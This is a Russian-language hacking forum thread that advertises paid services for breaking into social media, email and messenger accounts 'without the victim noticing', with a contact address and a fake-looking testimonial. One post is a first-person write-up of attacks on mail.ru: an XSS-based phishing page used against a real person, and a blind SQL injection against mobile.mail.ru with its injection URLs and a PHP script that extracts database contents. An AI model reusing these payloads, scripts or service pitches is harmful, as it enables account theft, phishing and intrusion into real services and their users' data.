воспользоваться Гарант Сервисом, что обезопасит вас от обмана. Если вы хотите заказать услуги по взлому ватсап или чего-либо другого, помните, что форум это лучшее место. Во всевозможных агентствах и сервисах часто используют заказные отзывы, да и стоимость услуг по взлому вайбера и вотсап у них намного выше, нежели у частных исполнителей.
  17. Как и обещала в случае успешного выполнения заказа пишу положительный отзыв. Спец Xakerfox проделал работу четко и без замечаний, благодарю вас за это, у меня есть еще два заказа, я обращусь к вам позже. Спасибо.
  18. Приветствую всех! Я являюсь хакером. Постоянно провожу время за компьютером. Обычно отзывы о сайтах не оставляю, подобными глупостями заниматься нет времени. Но сегодня решил оповестить вас парой строк о сайте, в котором имеются все возможности для хакеров разных уровней, а также много перспектив на вакансии по работе с программированием. Для меня нашлось не мало полезной информации. Пообщались с ребятами, которые здесь работают, обменялись различными методиками работы а так же нашёл малварь, хакерсофт, да много ещё всего. Предложил свои услуги, которые оценились по достоинству. Впредь и дальше буду использовать этот сайт. xakersay.com это класс. Ну в общем не теряйтесь, всё что нужно хакерам и программистам, всё тут есть. Проходите быструю регистрацию и найдёте всё что вам необходимо. Успехов!
  19. ПРЕДОСТАВЛЕНИЕ УСЛУГ ПО ВЗЛОМУ: **1 Взлом СОЦИАЛЬНЫЕ СЕТИ: 1.1 Взлом В контакте (vkontakte.ru) 1.2 Взлом Одноклассники (odnoklassniki.ru) 1.3 Взлом Фейсбук (Facebook) 1.4 Взлом Twitter 1.5 Взлом Instagram 1.6 Взлом Мой мир 1.7 Взлом Ask 1.8 Взлом Google + **2 Взлом ПОЧТЫ: 2.1 Взлом mail.ru 2.2 Взлом yandex.ru 2.3 Взлом rambler.ru 2.4 Взлом gmail.com 2.5 Взлом ukr.net 2.6 Взлом yahoo.com 2.7 Взлом hotmail.com 2.8 Взлом qip-pochta 2.9 Взлом mamba.ru ---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения, такие как приложения электронной почты, доступа к базе данных и управления документами, с внешними приложениями. **3 распечатка смс и звонков мобильных операторов **4 Взлом Сайты знакомств рассмотрим любой хостинг **5 Взлом Icq, qip **6 Очистка кредитной истории **7 Взлом друг вокруг, Viber, WhatsApp ОБЯЗУЕМСЯ: - Крайне высокая вероятность взлома - 99.9% - Пароли не меняем - "жертва" будет продолжать пользоваться анкетой, ничего не подозревая - Кратчайшие сроки выполнения заказа - Анонимность и конфиденциальность полностью соблюдается - Простейшая и удобная система оплаты: биткоин или Киви которые можно оплатить в любом платёжном терминале или через салон сотовой связи. - Постоянным клиентам - солидные скидки ОБРАЩАТЬСЯ: *Почта: xaktop@protonmail.com - - - - - - - - - - - - - - - - - - - ПРЕДОСТАВЛЕНИЕ УСЛУГ ПО ВЗЛОМУ: **1 Взлом СОЦИАЛЬНЫЕ СЕТИ: 1.1 Взлом В контакте (vkontakte.ru) 1.2 Взлом Одноклассники (odnoklassniki.ru) 1.3 Взлом Фейсбук (Facebook) 1.4 Взлом Twitter 1.5 Взлом Instagram 1.6 Взлом Мой мир 1.7 Взлом Ask 1.8 Взлом Google + **2 Взлом ПОЧТЫ: 2.1 Взлом mail.ru 2.2 Взлом yandex.ru 2.3 Взлом rambler.ru 2.4 Взлом gmail.com 2.5 Взлом ukr.net 2.6 Взлом yahoo.com 2.7 Взлом hotmail.com 2.8 Взлом qip-pochta 2.9 Взлом mamba.ru ---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения, такие как приложения электронной почты, доступа к базе данных и управления документами, с внешними приложениями. **3 распечатка смс и звонков мобильных операторов **4 Взлом Сайты знакомств рассмотрим любой хостинг **5 Взлом Icq, qip **6 Очистка кредитной истории **7 Взлом друг вокруг, Viber, WhatsApp ОБЯЗУЕМСЯ: - Крайне высокая вероятность взлома - 93% - Пароли не меняем - "жертва" будет продолжать пользоваться анкетой, ничего не подозревая - Кратчайшие сроки выполнения заказа - Анонимность и конфиденциальность полностью соблюдается - Простейшая и удобная система оплаты: биткоин, киви которые можно оплатить в любом платёжном терминале или салоне сотовой связи - Постоянным клиентам - солидные скидки ОБРАЩАТЬСЯ: *Почта: xaktop@protonmail.com
  20. Услуги взлома это очень тонкая грань между обманом и добросовестным выполнением работы. Если вы заказываете услуги хакера, будьте внимательны и посмотрите в первую очередь проверен пользователь или нет, если есть сомнения тогда пользуйтесь гарант сервисом который мы предлагаем. Нет я не хочу сказать что те кто не проходит проверку обманывают людей, не в коем случае, на то есть определенные причины почему хакер который предлагает услуги взлома, не захотел проходить проверку. Лично мой опыт таков, я сталкивался с очень хорошими парнями и девушками хакерами лично, которые не проходят проверку а знают свое дело на очень высоком уровне, я бы даже их назвал профессиональными хакерами. Приведу несколько причин почему некоторые хакеры отказываются это делать. 1.Опытный хакер предлагает свои услуги, а выносить уж совсем на всеобщее обозрение своё умение того или иного в качестве проверки не желает. Он просто кинул свою рекламу где-то в сети и забыл о ней, те кто обратился, обратились, забрали свой заказ и забыли о услугах взлома, а хакер забыл о клиенте. Повторюсь услуги взлома, которые профессиональный хакер, делает на высшем уровне, многие именно так и работают как я описал выше. я не буду описывать массу причин, скажу еще одну. 2. Уверенный в себе хакер, будет опасаться таких проверок лично по собственным соображениям, пример если он будет каждому кто обратился доказывать что он хакер, его просто в любом случае посадят, повторюсь в любом случае! Eсли каждому показывать он рано или поздно попадет в тюрьму. Делаем выводы, каждый хакер который проходит проверку, использует очень хорошую защиту и как минимум алиби, на случай проблем с чекистами. (ПРОВЕРКА ВЕДЬ ЭТО СВОЕГО РОДА ПОКАЗАТЬ ВСЕМ СВОЕ УМЕНИЕ В НАПРАВЛЕНИИ ВЗЛОМА) Но хочу заметить если хакер который предлагает услуги взлома, прошел проверку, это значит что он как минимум работает реально давно и настроен работать и дальше. Во первых он (хакер профессионал) знает что будет всё хорошо с выполнением и с безопасностью соответственно. Во вторых, прошедший проверку на выполнение услуг взлома хакер знает что он делает, прекрасно понимает все риски и предпринял уже всё чтоб обезопасить себя, так как это очень рискованно для него же самого, но проверка есть проверка, например я админ форума даю почту и прошу её взломать, он делает это и пишет мне с нее, я пишу туда письмо на уже взломаную им почту (которую дали для проверки), он отправляет мне текст письма которое я написал и отдает логин и пароль от нее (почты) если конечно логин изменил, сейчас все стараются оставить логин и пароль прежними, чтоб хозяин взломаной почты, страницы соц.сети не догадался о том что кто-то там уже побывал, я проверяю был ли там кто-то и ставлю ему метку что он проверенный, для его работы это плюс конечно же и для клиентов тоже, но для хакера это риск. В третьих, это не в коем случае не означает, что хакер который предлагает услуги взлома и который прошел проверку на разных форумах и так далее, будет каждому показывать снова факт взлома, это уже опять же остается на усмотрение самого хакера (так как он итак рискует когда проверяется на различных форумах). Если у вас есть сомнения я повторяю используйте сервис гарант, таким образом вы максимально обезопасите себя от рисков, рисков таких как обман со стороны тех кто занимается не услугами взлома, они же услуги хакера, а обыкновенным мошенничеством. Если у кого либо из вас остались вопросы, задавайте их, постараюсь объяснить более подробно. Надеюсь статья Услуги взлома, взлом почты, проверенные и не проверенные хакеры, была вам полезна. Будьте бдительны и читайте форум хакеров xakersay.com, До новых встреч.
  21. Почти 100% учетных записей «Почты Mail.Ru» из базы хакеров, о которых заявлял основатель Hold Security Алекс Холден, неактуально. Это показали результаты исследования фрагмента базы, проведенного специалистами по информационной безопасности Mail.Ru Group. В среду Алекс Холден сообщил о взломе 272,3 млн. почтовых аккаунтов, среди которых порядка 57 млн. – пользователи сервиса Mail.Ru. Под угрозой находятся еще десятки миллионов почтовых аккаунтов в Yahoo (40 млн.), Microsoft Hotmail (33 млн.) и Google (почти 24 млн.). «99,982% учетных записей «Почты Mail.Ru» в проанализированной базе невалидны. С высокой долей вероятности она скомпилирована из фрагментов многочисленных старых баз логинов-паролей от взлома различных онлайн-сервисов, где юзеры использовали в качестве логина свою электронную почту», – приводит ТАСС сообщение Mail.Ru Group по результатам исследования. «Это заставляет предположить, что данный отчет – грамотный информационный вброс, направленный на привлечение внимания к бизнесу Холдена в области оказания услуг по кибербезопасности», – отмечает компания. В сообщении уточняется, что 22,56% проанализированных учетных записей содержат вообще никогда не существовавший адрес электронной почты, еще 64,27% – неправильный пароль, в базе также присутствуют записи, указанные вообще без пароля (0,74%). Согласно результатам исследования, всего 0,018% пар логинов-паролей, содержащихся в проанализированном фрагменте, могли быть рабочими. Владельцы этих ящиков уже получили уведомление о необходимости сменить пароль.
  22. Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у мэйла есть много других сервисов помимо почтового, в строке запроса я написал: site:*mail.ru. В ответ гугль вывалил 20 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры mail.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.mail.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: http://7ya.mail.ru/image.php?in=phot...=500&big_h=375 Я решил его подкорректировать, получилось вот что: http://7ya.mail.ru/image.php?in=">Russian Net Hunters - Rulezzz Как видишь получилось - Russian Net Hunters Rulezzz. Одним из последних сервисов был форумы@mail.ru, я попробовал скуль-инжекшн через форму авторизации, но меня редиретнуло на страницу, в которой говорилось, что я не зарегистрирован, и тут мое внимание привлекла адресная строка: http://talk.mail.ru/login.html?target= Я решил проверить переменную target на XSS, набрав в адресной строке http://talk.mail.ru/login.html?target="> Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный юзер решит, что произошли какие-нить сбои в работе службы DNS. [testing...] Для проверки всего сказанного я написал "жалостливое" письмо своей новой подружке от бедных админов support@mail.ru c просьбой кликнуть по ссылке... и вскоре в файле logs.txt появилась новая строчка... На следующий день pixcher нашел sql-inj: http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' Ошибка выполнения запроса! SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = 0 AND singer_id = '9'' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 1 Я не поверил своим глазам, но после нажатия на кнопку REFRESH баг не исчез =) Запрос к БД на число мелодий по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда я заметил, что запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' or 1=1/* выполняется и выдаёт нам кучу мелодий на скачивание, а запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' or 1=2/* выдаёт 0 => никакого списка рингтонов не отображает =), а это значит то, что можно посимвольно брутить поля базы данных! Для начало попробуем сбрутить имя пользователя БД user(). SQL функция substring(user(),1,1) выдёргивает из строки user() первый символ, а функция lower(substring(user(),1,1)) ещё и переводит его в нижний регистр. Запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' AND lower(substring(user(),1,1))="a"/* не выдал ни одного рингтона - а значит первая буква пользователя БД не "a" =(. Первый символ я подобрал вручную, запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' AND lower(substring(user(),1,1))="i"/* выдавал мне полный перечень музона и я понял, что для облегчения этого беспонтового ручного перебора нужно писать скрипт... Наш скрипт должен скачивать страницу, меняя в запросе ="a" на остальные символы английского алфавита и если в теле скаченной страницы присутствует наш список мелодий (практическим путём было выяснено, что такая страница содержит волшебное число 17107 ), то скрипт должен показать нам этот символ и перейти к поиску второго символа, то есть выполняя запросы, содержащие substring(user(),2,1) и т.д. Не долго думая я запусти блокнот и начал вбивать в него до боли знакомые строки любимого PHP. У меня получилось примерно так: # Скрипт для посимвольного брута полей БД by pixcher (http://runthes.ru) set_time_limit(0); // пусть наш скрипт не обламывается, если перебор затягивается на длительное время $find="user()";# Искомая строка (здесь может быть любое поле БД в виде подзапроса) $bruteline ='qwertyuiopasdfghjklzxcvbnm1234567890_+!@#$%^&* '"()';# Предполагаем, что исходная строка состоит только из этих символов $k=1;# Номер символа, который мы брутим (изначально первый =)) # Далее идёт функция для скачивания веб странички, адрес которой передаётся ей в параметре function get_page ($link){ $url = parse_url ($link); $scr = $url['path']; $scr .= ($url['query'] > "")?"?".$url['query']:""; $scr .= ($url['fragment'] > "")?"#".$url['fragment']:""; $host .= $url['host']; $port = ($url['port'] > "")?$url['port']:80; $sock = fsockopen ($host, $port); fputs ($sock, "GET /$scr HTTP/1.0rnHost: $hostrnrn"); $cont = ""; while (!feof ($sock)) { $cont .= fgets ($sock); } fclose ($sock); return $cont; } for ($i=0;$i$link="http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9'%20AND%20lower(substri ng($find,$k,1))="$bruteline[$i]"/*";# Динамически изменяющийся запрос =) $page=get_page($link);# Скачиваем страницу if(strstr($page, "17107")){ # ...и если она содержит магическое число 17107... echo "$bruteline[$i]"; # ...показываем найденный символ... $i=0; # ...начинаем перебор заново... $k++; # ...но для следующего символа }} ?> Запускаем наш скрипт и... видим имя пользователя БД: "inform@yavanna.mtu". Попробуем вместо $find="user()"; перебирать результаты подзапроса, например $find="(SELECT password from mysql.user LIMIT 1)"; Запускаем скрипт, но он выдаёт... эх... подзапросы к сожалению не поддерживаются в почтовой БД =( Ничего страшного, UNION SELECT ещё никто не отменял, так что возможен такой перебор: http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=-9' UNION SELECT 1 FROM mysql.user where user="inform" and lower(substring(password,1,1))="a" но к этому моменту меня уже стало воротить от одной мысли о запросе к БД и я "вдруг" вспомнил, что неправомерный доступ к конфиденциальной информации карается законом =) [end...]
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.